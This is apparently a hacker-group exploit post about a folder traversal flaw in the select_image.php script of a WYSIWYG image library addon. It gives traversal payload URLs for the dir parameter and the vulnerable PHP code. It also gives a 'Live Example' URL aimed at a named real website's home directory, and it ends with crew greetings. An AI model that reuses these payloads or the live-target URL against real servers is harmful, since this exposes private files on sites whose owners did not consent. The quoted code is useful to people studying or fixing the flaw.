# Author : Geek
# Title : Wysiwyg Imagelibrary Addons (Folders Traversal)
# Date : Today :P
# Site : Sec4ever.com

# p0x :

    {x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=full path to public_html or httpdocs
    {x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=..%2Fhome..%2Fuser..%2Fpublic_html

# Code : 

$get_dir = isset($_GET['dir']) ? prepare_input($_GET['dir']) : "";

......

    if($get_dir){
        $dir = base64_decode($get_dir);
        
        if(substr($dir, -1, 1)!='/') {
            $dir = $dir . '/';
        }
        $dirok = true;
        $dirnames = split('/', $dir);
        for($di=0; $di<sizeof($dirnames); $di++) {
            if($di<(sizeof($dirnames)-2)) {
                $dotdotdir = $dotdotdir . $dirnames[$di] . '/';
            }
        }
        if(substr($dir, 0, 1)=='/') {
            $dirok = false;
        }
    
        if($dir == $leadon) {
            $dirok = false;
        }
        
        if($dirok) {
            $leadon = $dir;
        }
    }
    
    $opendir = $leadon;
    if(!$leadon) $opendir = '.';
    if(!file_exists($opendir)) {
        $opendir = '.';
        $leadon = $startdir;
    }
    
    
# Live Example : 

    {X} http://www.tourismhalong.com/includes/wysiwyg/addons/imagelibrary/select_image.php?dir=%2Fhome%2Ftouris8%2Fpublic_html

# Greet'z : b0x,Sec4ever,paulzz,The Sword,The Injector,B07 M4ST3R,Jago :P,LinuxAC,Cmos-CLR :P <3 And All Sec4ever VIP Members And Others :)